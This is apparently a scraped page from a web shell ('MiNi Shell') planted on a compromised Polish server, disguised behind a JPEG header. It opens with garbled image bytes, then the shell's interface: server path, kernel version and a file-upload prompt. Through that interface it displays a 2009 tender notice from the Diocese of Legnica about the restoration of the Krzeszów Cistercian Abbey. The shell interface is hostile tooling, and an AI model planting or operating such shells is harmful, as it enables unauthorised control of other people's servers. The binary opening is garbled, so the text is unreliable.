JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090904/147611-N-2009.html

<p class="kh_header"><b>Legnica: Pełnienia funkcji inwestora zastępczego w ramach Zadania pn. Rewaloryzacja Zespołu Opactwa Cystersów wraz z otoczeniem w Krzeszowie - etap II</b><br>
<b>Numer ogłoszenia: 147611 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Diecezja Legnicka , ul. Jana Pawła II 1, 59-220 Legnica, woj. dolnośląskie, tel. 0-76 724 41 00, faks 0-76 724 41 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: religia.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienia funkcji inwestora zastępczego w ramach Zadania pn. Rewaloryzacja Zespołu Opactwa Cystersów wraz z otoczeniem w Krzeszowie - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot niniejszego zamówienia obejmuje pełnienie funkcji inwestora zastępczego (Inwestora) polegające co najmniej na nadzorowaniu:
-  umowy na roboty budowlane w ramach Zadania pn. Wykonanie robót budowlanych 
w ramach Zadania pn. Rewaloryzacja Zespołu Opactwa Cystersów wraz 
z otoczeniem w Krzeszowie - etap II, obejmującej wykonanie robót budowlanych na 
5 obiektach wpisanych do rejestru zbytków, w skład, których wchodzą:
1) Kościół pw. Wniebowzięcia Najświętszej Marii Panny;
2) Kościół pw. Św. Józefa;
3) Klasztor Sióstr Benedyktynek;
4) Dom Opata; oraz
5) zagospodarowanie terenu Zespołu Klasztornego.
Całość robót zostanie wykonana zgodnie z przepisami Prawa budowlanego, dokumentacją projektową, Specyfikacjami Technicznymi Warunkami Wykonania i Odbioru Robót Budowlanych, przepisami BHP, wytycznymi Konserwatora zabytków oraz warunkami zawartej umowy, oraz
- umowy na prace konserwatorskie w ramach Zadania pn. Wykonanie prac konserwatorskich w ramach Zadania pn. Rewaloryzacja Zespołu Opactwa Cystersów wraz z otoczeniem w Krzeszowie - etap II, obejmującej wykonanie:
a) w Kościele p.w. Wniebowzięcia Najświętszej Marii Panny w Krzeszowie:
- konserwacja malarstwa ściennego J.W. Neunhertza na sklepieniach nawy głównej, 
w kaplicach bocznych ścianie wschodniej prezbiterium i na sklepieniu przy wejściu głównym wraz z wystrojem sztukatorskim,
- konserwacja malowideł ściennych J.W. Neunhertza oraz zabytkowych elementów wystroju mauzoleum Piastów,
- konserwacja zabytków elementów wyposażenia wnętrza,
- konserwacja rzeźbiarskiego i kamiennego wystroju elewacji,
- konserwacja grupy rzeźbiarskiej znajdującej się na bramie przy kościele,
b) w Kościele p.w. św. Józefa w Krzeszowie:
- konserwacja zabytkowych elementów wystroju.
Prace konserwatorskie winny zostać wykonane zgodnie z obowiązującymi przepisami, programami prac konserwatorskich, udzielonymi decyzjami pozwolenia na prowadzenie prac konserwatorskich i robót przy zabytku, zaleceniami Zamawiającego oraz warunkami zawartej umowy.
2. Do czynności Inwestora zastępczego należało będzie w m.in.:
-  wykonywanie obowiązków wynikających z umowy na roboty budowlane i umowy na prace konserwatorskie, w ścisłej współpracy z Zamawiającym i Wojewódzkim Konserwatorem Zabytków, stosując się do ich zaleceń;
- organizowanie, koordynowanie i prowadzenie rad technicznych, na których będą przedstawiciele wykonawcy robót budowlanych i prac konserwatorskich;
- mobilizacja zespołu Inwestora, nadzorowanie umowy na roboty budowlane i umowy na prace konserwatorskie oraz w okresie gwarancji jakości/rękojmi za wady;
- zarządzanie, nadzorowanie i administrowanie umowy na roboty budowlane i umowy na prace konserwatorskie zgodnie z wytycznymi zawartymi w Opisie Przedmiotu Zamówienia;
- monitorowanie robót budowlanych i prac konserwatorskich w zależności od źródeł finansowania;
-  pozostałe czynności szczegółowo opisane w SIWZ - część III pn. OPZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 10 000 PLN (słownie: dziesięć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca ubiegający się o zamówienie publiczne musi spełniać niżej wymienione warunki udziału w postępowaniu:
1) posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegać wykluczeniu z postępowania na podstawie art. 24 Ustawy Pzp;
Opis sposobu dokonywania oceny spełniania warunku:
- Wykonawca spełnia warunek, jeżeli posiada uprawnienia do wykonywania określonej działalności lub czynności (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie każdego wykonawcy odrębnie).
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć dokumenty wymienione w punkcie 9 IDW.
2) posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Opis sposobu dokonywania oceny spełniania warunku:
a) Wykonawca spełnia warunek, jeżeli w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
- 1 usługę polegającą na pełnieniu funkcji Inżyniera/Inwestora zastępczego na umowie/kontrakcie polegającym na wykonaniu, w obiekcie wpisanym do rejestru zabytków, robót budowlano-konserwatorskich o łącznej wartości co najmniej 4.000.000,00 PLN; 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w punkcie 9 IDW.
b) Wykonawca spełnia warunek, jeżeli dysponuje/będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia, spełniającymi co najmniej następujące wymagania:
Ekspert nr 1: Kierownik Zespołu/Inżynier Rezydent posiadający:
- co najmniej 6-letnie doświadczenie zawodowe w kierowaniu/nadzorowaniu wykonania robót budowlanych, w tym kierowanie/nadzorowanie minimum 1 kontraktem/umową o wartości brutto min. 4.000.000,00 PLN, obejmującym prace budowlano-konserwatorskie na obiekcie wpisanym do rejestru zabytków;
- odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych - zgodnie z § 8 ust. 2 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150 
z 2004r., poz. 1579);
Ekspert nr 2 Inspektor nadzoru w specjalności budowlanej posiadający:
- minimum 4-letnie doświadczenie zawodowe w zakresie nadzoru, w tym doświadczenie jako inspektor nadzoru robót budowlanych na co najmniej 1 kontrakcie/umowie o wartości nie niższej niż 4.000.000,00 PLN brutto, obejmującym roboty budowlano-konserwatorskie na obiekcie wpisanym do rejestru zabytków;
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń 
w specjalności konstrukcyjno-budowlanej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) [ustawa z dnia 7 lipca 1994 r. Prawo budowlane tekst jednolity Dz. U. z 2006 r. nr 156, poz. 1118 ze zm. - art. 12 ust. 2 
z uwzględnieniem art. 104] wraz z zaświadczeniem o przynależności do właściwej izby samorządu zawodowego;
- odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych - zgodnie z § 8 ust. 2 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150 
z 2004r., poz. 1579);
Ekspert nr 3 Inspektor nadzoru w specjalności konstrukcyjno-budowlanej posiadający:
- minimum 4-letnie doświadczenie zawodowe w zakresie nadzoru, w tym doświadczenie jako inspektor nadzoru robót budowlanych, na co najmniej 1 kontrakcie/umowie o wartości nie niższej niż 4.000.000,00 PLN brutto, obejmującym roboty budowlano-konserwatorskie na obiekcie wpisanym do rejestru zabytków;
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń 
w specjalności konstrukcyjno-budowlanej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) [ustawa z dnia 7 lipca 1994 r. Prawo budowlane tekst jednolity Dz. U. z 2006 r. nr 156, poz. 1118 ze zm. - art. 12 ust. 2 
z uwzględnieniem art. 104] wraz z zaświadczeniem o przynależności do właściwej izby samorządu zawodowego;
- odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych - zgodnie z § 8 ust. 2 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150 
z 2004r., poz. 1579);
Ekspert nr 4 Inspektor nadzoru w specjalności sanitarnej posiadający:
- minimum 4-letnie doświadczenie zawodowe w zakresie nadzoru, w tym doświadczenie jako inspektor nadzoru robót budowlanych, na co najmniej 1 kontrakcie/umowie o wartości nie niższej niż 4.000.000,00 PLN brutto, obejmującym roboty budowlano-konserwatorskie na obiekcie wpisanym do rejestru zabytków;
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych 
i kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) [ustawa z dnia 7 lipca 1994 r. Prawo budowlane j.t. Dz. U. z 2006 r. nr 156, poz. 1118 ze zm. - art. 12 ust. 2 z uwzględnieniem art. 104] wraz z zaświadczeniem o przynależności do właściwej izby samorządu zawodowego;
- odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych - zgodnie z § 8 ust. 2 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150 
z 2004r., poz. 1579);
Ekspert nr 5 Inspektor nadzoru w specjalności elektrycznej posiadający:
- minimum 4-letnie doświadczenie zawodowe w zakresie nadzoru, w tym doświadczenie jako inspektor nadzoru robót budowlanych, na co najmniej 1 kontrakcie/umowie o wartości nie niższej niż 4.000.000,00 PLN brutto, obejmującym roboty budowlano-konserwatorskie na obiekcie wpisanym do rejestru zabytków;
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) [ustawa z dnia 7 lipca 1994 r. Prawo budowlane j.t. Dz. U. z 2006 r. 
nr 156, poz. 1118 ze zm. - art. 12 ust. 2 z uwzględnieniem art. 104] wraz z zaświadczeniem o przynależności do właściwej izby samorządu zawodowego;
- odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych - zgodnie z § 8 ust. 2 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150 
z 2004r., poz. 1579);
Ekspert nr 6 ds. rozliczeń finansowych i raportowania posiadający:
- minimum 4-letnie doświadczenie zawodowe, w tym doświadczenie w zakresie prowadzenia obmiarów, analizy kosztów budowy oraz sporządzania raportów, na co najmniej jednym kontrakcie/umowie o wartości robót nie mniejszej niż 
5.000.000,00 PLN;
- doświadczenie w rozliczaniu robót budowlano-konserwatorskich współfinansowanych z funduszy unijnych bądź innych środków zewnętrznych, w tym, co najmniej 1 kontraktu o wartości robót  min. 2.000.000,00 PLN brutto.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w punkcie 9 niniejszej IDW.
3. znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Opis sposobu dokonywania oceny spełniania warunku:
Wykonawca spełnia warunek jeżeli:
a) posiada środki finansowe w wysokości co najmniej 100.000,00 PLN lub zdolność kredytową w wysokości co najmniej 100.000,00 PLN.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć dokumenty wymienione w punkcie 9 IDW.
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 1.000.000,00 PLN
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć dokumenty wymienione w punkcie 9 IDW.
Ocena spełniania w/w warunków udziału w postępowaniu dokonana zostanie według reguły pełnia/nie spełnia, na podstawie złożonych dokumentów, kreślonych w punkcie poniżej.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  W celu potwierdzenia spełniania warunków udziału w postępowaniu, opisanych powyżej Wykonawca zobowiązany są przedłożyć:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu na podstawie art. 24 Ustawy Pzp, sporządzone według Załącznika nr 2 do IDW;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w/w dokument musi dotyczyć każdego z Wykonawców i winien być złożony przez: każdego z nich odrębnie jedynie w sytuacji, jeśli każdy z nich spełnia wszystkie warunki samodzielnie, bądź przez Pełnomocnika występującego w imieniu wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, na podstawie udzielonego pełnomocnictwa).
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
3) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 Ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
4) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
5) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
6) wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, sporządzone według załącznika nr 3 do IDW;
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, wykaz składa wykonawca spełniający ten warunek udziału w postępowaniu).
7) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, sporządzone według załącznika nr 4 do IDW wraz z dokumentami potwierdzającymi, że osoby te posiadają wymagane uprawnienia;
W przypadku, gdy Wykonawca będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia przedłoży wraz z ofertą pisemne zobowiązanie innego podmiotu do udostępnienia osób zdolnych do wykonania zamówienia;
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, wykaz składa wykonawca spełniający ten warunek udziału w postępowaniu).
8) informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, wykaz składa wykonawca spełniający ten warunek udziału w postępowaniu lub wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie).
9) polisa, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, wykaz składa wykonawca spełniający ten warunek udziału 
w postępowaniu).

2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1.2), 1.4) i 1.5) - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzająco odpowiednio, że;
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienia.
- zamiast dokumentów, o których mowa w pkt 1.3) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy Pzp.
3. Dokumenty, o których mowa w pkt 2.a) i 2.c), winny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, o których mowa w pkt 2.b) winny być wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert.
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy punktu 3. stosuje się odpowiednio.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.diecezja.legnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Diecezja Legnicka
ul. Jana Pawła II nr 1 
59-220 Legnica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2009 godzina 10:00, miejsce: Diecezja Legnicka
ul. Jana Pawła II nr 1 
59-220 Legnica
notariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com